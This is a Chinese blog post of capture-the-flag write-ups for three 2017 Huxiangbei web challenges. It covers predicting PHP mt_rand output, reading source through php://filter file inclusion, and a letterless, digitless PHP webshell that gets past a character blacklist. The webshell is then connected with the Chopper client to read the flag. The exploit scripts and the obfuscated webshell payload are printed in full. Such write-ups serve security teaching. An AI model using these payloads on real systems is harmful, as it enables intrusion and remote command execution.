sky's blog

2017 湖湘杯复赛web题解

字数统计: 1,628阅读时长: 9 min
2017/11/25 Share

web150

拿到题目先分析了一下,猜测可能有文件泄露,于是扫描
得到文件泄露:
http://114.215.138.89:10080/.index.php.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
error_reporting(0);
$flag = "*********************";
echo "please input a rand_num !";
function create_password($pw_length = 10){
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++){
$randpwd .= chr(mt_rand(100, 200));
}
return $randpwd;
}

session_start();

mt_srand(time());

$pwd=create_password();

echo $pwd.'||';

if($pwd == $_GET['pwd']){
echo "first";
if($_SESSION['userLogin']==$_GET['login'])
echo "Nice , you get the flag it is ".$flag ;
}else{
echo "Wrong!";
}

$_SESSION['userLogin']=create_password(32).rand();

?>

看到这样的题目最容易了,直接就是随机数的预测
因为是mt_rand()和mt_srand()
所以只要提前预知种子,即time()即可提前预测出这个时候的$pwd
所以我们写出预测脚本

1
2
3
4
5
6
7
8
9
10
11
12
<?php
function create_password($pw_length = 10){
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++){
$randpwd .= chr(mt_rand(100, 200));
}
return $randpwd;
}
mt_srand(time()+30);
$pwd=create_password();
echo base64_encode($pwd);
?>

然后把这里生产的base64放进如下Python脚本

1
2
3
4
5
6
7
8
9
10
11
import requests
import base64
import urllib
url ="http://114.215.138.89:10080/?pwd=%s"
payload = urllib.quote(base64.b64decode("v4Rmrr+ssn22Zg=="))
url = url%(payload)
while True:
s=requests.get(url=url)
if "flag" in s.content:
print s.content
break

运行后即可拿到flag:

1
please input a rand_num !<br>��f����}�f||firstNice , you get the flag it is hxb2017{6583be26c1403c25677c03ac7b3d1f22}

hxb2017{6583be26c1403c25677c03ac7b3d1f22}

web200

看到url的形式如下:

1
http://118.190.87.135:10080/?op=upload

猜测会不会是文件包含
随手测试一下:

1
http://118.190.87.135:10080/?op=php://filter/read=convert.base64-encode/resource=./index

得到源码:

1
PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwpkZWZpbmUoJ0ZST01fSU5ERVgnLCAxKTsKCiRvcCA9IGVtcHR5KCRfR0VUWydvcCddKSA/ICdob21lJyA6ICRfR0VUWydvcCddOwppZighaXNfc3RyaW5nKCRvcCkgfHwgcHJlZ19tYXRjaCgnL1wuXC4vJywgJG9wKSkKICAgIGRpZSgnVHJ5IGl0IGFnYWluIGFuZCBJIHdpbGwga2lsbCB5b3UhIEkgZnJlYWtpbmcgaGF0ZSBoYWNrZXJzIScpOwpvYl9zdGFydCgnb2JfZ3poYW5kbGVyJyk7CgpmdW5jdGlvbiBwYWdlX3RvcCgkb3ApIHsKPz48IURPQ1RZUEUgaHRtbD4KPGh0bWw+CjxoZWFkPgoJPG1ldGEgY2hhcnNldD0iVVRGLTgiPgoJPHRpdGxlPlBhbmR1cGxvYWRlcjo6PD89IGh0bWxlbnRpdGllcyh1Y2ZpcnN0KCRvcCkpOyA/PjwvdGl0bGU+CjwvaGVhZD4KPGJvZHk+Cgk8ZGl2IGlkPSJoZWFkZXIiPgoJCTxjZW50ZXI+PGEgaHJlZj0iP29wPWhvbWUiIGNsYXNzPSJsb2dvIj48aW1nIHNyYz0iaW1hZ2VzL2xvZ28uanBnIiBhbHQ9IiI+PC9hPjwvY2VudGVyPgoJPC9kaXY+Cgk8ZGl2IGlkPSJib2R5Ij4KPD9waHAKfQoKZnVuY3Rpb24gZmF0YWwoJG1zZykgewo/PjxkaXYgY2xhc3M9ImFydGljbGUiPgo8aDI+RXJyb3I8L2gyPgo8cD48Pz0kbXNnOz8+PC9wPgo8L2Rpdj48P3BocApleGl0KDEpOwp9CgpmdW5jdGlvbiBwYWdlX2JvdHRvbSgpIHsKPz4KICAgIDwvZGl2PgogICAgPGNlbnRlcj4KCTxkaXYgaWQ9ImZvb3RlciI+CgkJPGRpdj4KCQkJPHA+CgkJCQk8c3Bhbj4yMDE3ICZjb3B5OyA8L3NwYW4+IEFsbCByaWdodHMgcmVzZXJ2ZWQuCgkJCTwvcD4KCQk8L2Rpdj4KCTwvZGl2PgoJPC9jZW50ZXI+CjwvYm9keT4KPC9odG1sPjw/cGhwCm9iX2VuZF9mbHVzaCgpOwp9CgpyZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbigncGFnZV9ib3R0b20nKTsKCnBhZ2VfdG9wKCRvcCk7CgppZighKGluY2x1ZGUgJG9wIC4gJy5waHAnKSkKICAgIGZhdGFsKCdubyBzdWNoIHBhZ2UnKTsKPz4K

解码后得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
<div id="header">
<center><a href="?op=home" class="logo">![](images/logo.jpg" alt=""></a></center>
</div>
<div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}

function page_bottom() {
?>
</div>
<center>
<div id="footer">
<div>
<p>
<span>2017 &copy; </span> All rights reserved.
</p>
</div>
</div>
</center>
</body>
</html><?php
ob_end_flush();
}

register_shutdown_function('page_bottom');

page_top($op);

if(!(include $op . '.php'))
fatal('no such page');
?>

于是猜测有flag.php

1
http://118.190.87.135:10080/?op=php://filter/read=convert.base64-encode/resource=./flag

解码后得到:

1
2
3
<?php 
$flag="flag{c420fb4054e91944a71ff68f7079b9424e5cba21}";
?>

web300

题目直接给出了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php 
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
if(!isset($_GET['content'])){
show_source(__FILE__);
die();
}
function rand_string( $length ) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$size = strlen( $chars );
$str = '';
for( $i = 0; $i < $length; $i++) {
$str .= $chars[ rand( 0, $size - 1 ) ];
}
return $str;
}
$data = $_GET['content'];
$black_char = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', '|', '~');
foreach ($black_char as $b) {
if (stripos($data, $b) !== false){
die("关键字WAF");
}
}
$filename=rand_string(0x20).'.php';
$folder='uploads/';
$full_filename = $folder.$filename;
if(file_put_contents($full_filename, '<?php '.$data)){
echo "<a href='".$full_filename."'>shell</a></br>";
echo "我的/flag,你读到了么";
}else{
echo "噢 噢,错了";
}

字母什么的都过滤了
这里参考p神的一些不包含数字和字母的webshell:
其思路就是利用字符串ARRAY获取字符A,利用php的特性,从A递增获得A到Z的各个字母。原webshell存在修改其webshell
所以精心构造出payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
$_='';$_[+$_]++;
$_=$_.'';
$__=$_[+''];
$_ = $__;
$___=$_;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$_=$$____;
$___($_[_]);

我的payload如下:

1
http://120.24.215.80:10010/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);

然后顺利得到回显:

1
2
shell
我的/flag,你读到了么

点击shell跳转到

1
http://114.215.71.135:10080/uploads/u75w777z0OAw65efHiVTHLGqvf85SqCd.php

上菜刀,密码是_
连接后一顿输出

1
2
cd ..
ls

得到回显:

1
2
3
4
[/var/www/html/]$ls
flag.php
index.php
uploads

然后

1
cat flag.php

得到flag:<?php $flag="=hxb2017{51f759f39ac1f0cd5509b299b1d908f7}"; ?>

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. web150
  2. 2. web200
  3. 3. web300